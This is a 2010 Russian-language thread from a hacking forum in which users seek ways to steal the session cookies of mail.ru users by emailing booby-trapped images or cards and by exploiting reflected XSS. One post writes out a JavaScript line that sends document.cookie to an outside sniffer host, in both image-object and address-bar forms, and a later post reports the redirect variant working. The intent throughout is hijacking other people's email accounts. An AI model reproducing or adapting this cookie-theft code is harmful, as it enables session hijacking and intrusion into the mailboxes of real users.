HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.02.2010, 01:00
6o6er
Новичок
Регистрация: 20.01.2010
Сообщений: 24
С нами: 8583446

Репутация: -1
По умолчанию

Всем привет! :bq:
Ещё есть какие то фишки с хаком типа:
ты отсылаешь на мыло картинку(или что то другое), жертва открывает её и к тебе на сниффер приходят куки.
Если есть, то напишите как)))или дайте линк)))
заранее спасибо!:smartass:
 
Ответить с цитированием

  #2  
Старый 20.02.2010, 01:00
Voland-791
Познающий
Регистрация: 01.05.2009
Сообщений: 40
С нами: 8962257

Репутация: 3
По умолчанию

Мне каждый день приходят всякие типо акции,розыгрыши,опросы за которые типо платят,фейки,предупреждени я тип отправте смс..,рассылка тип чтобы от неё отписаться пройдите по ссылочке... Из всех этих кидал можно придумать одно хорошое!)))
 
Ответить с цитированием

  #3  
Старый 02.03.2010, 01:00
ROCK_sTaR
Познающий
Регистрация: 04.02.2010
Сообщений: 45
С нами: 8561846

Репутация: 3
По умолчанию

Пассивка >alert() и пошёл по страницам искать, подставляя это в адресную строку...
 
Ответить с цитированием

  #4  
Старый 19.03.2010, 01:00
denis555
Участник форума
Регистрация: 16.09.2009
Сообщений: 131
С нами: 8764886

Репутация: 0
По умолчанию

нам тут гадать? для понта выложи код открытки тд и тп.
 
Ответить с цитированием

  #5  
Старый 19.03.2010, 01:00
zzzz_sasha_zzzz
Постоянный
Регистрация: 22.12.2009
Сообщений: 373
С нами: 8625206

Репутация: 5
По умолчанию

Цитата:

Сообщение от without_soul

hhhhh

Добавлено через 3 минуты
Подскажите плз :отправляю через снифер открытку яваскрипт,на мыло ,а в лог ничего не приходит после просмотра....да и при открытии не показывает картинку ,на которую вставил ссылку.....только пытаюсь учиться...!

для того чтоб приходило нужно найти пасивную xss на мыле как ето сделать?читай немного выше!
у тебя не прихдит так как пасивка уже не работает!
 
Ответить с цитированием

  #6  
Старый 23.03.2010, 01:00
Nekto321
Новичок
Регистрация: 22.03.2010
Сообщений: 2
С нами: 8495606

Репутация: 0
По умолчанию

А как искать пассивку?
Просто подставлять в конец адресной строки alert() ?

у меня есть одна пассивка на маил ру, но работает только когда не вошел под аккаунтом ...
как только входишь, то уже не работает..:wink:

подскажите как решить или пассивка уже не работает ?
 
Ответить с цитированием

  #7  
Старый 24.03.2010, 01:00
terris
Участник форума
Регистрация: 08.03.2010
Сообщений: 150
С нами: 8515766

Репутация: 14
По умолчанию

да о каком сниффере может идти речь на маил.ру??? Фотка-сниффер там уже не пашет!!!
 
Ответить с цитированием

  #8  
Старый 24.03.2010, 01:00
pavleg
Новичок
Регистрация: 22.08.2009
Сообщений: 0
С нами: 8799894

Репутация: 0
По умолчанию

обоснуй почему по твоему открытка не пашет?
 
Ответить с цитированием

  #9  
Старый 24.03.2010, 01:00
terris
Участник форума
Регистрация: 08.03.2010
Сообщений: 150
С нами: 8515766

Репутация: 14
По умолчанию

img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;
пишет "неверный формат изображения". невозможно открыть изображение прям там же.куки не приходят. а насчет скрипта для адресной строки javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;') этот код вобще невозможно вставить как ссылку и подсунуть юзеру. или у кого получается? поделитесь,жаль чтоли?

Добавлено через 1 минуту
да не пашет на маил.ру это img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;
пишет "неверный формат изображения". невозможно открыть изображение прям там же.куки не приходят. а насчет скрипта для адресной строки javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;') этот код вобще невозможно вставить как ссылку и подсунуть юзеру.
 
Ответить с цитированием

  #10  
Старый 25.03.2010, 01:00
vik3001
Новичок
Регистрация: 23.03.2010
Сообщений: 7
С нами: 8494166

Репутация: 0
По умолчанию

Вотвот, согласен с terris куки неприходят, а заставить жертву скопировать и вставить код в адресную строку, причём в тойже вкладке что и письмо думаю нереально.

Добавлено через 1 минуту
(JavaScript код для адресной строки c редиректом действительно работает и куки приходят)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.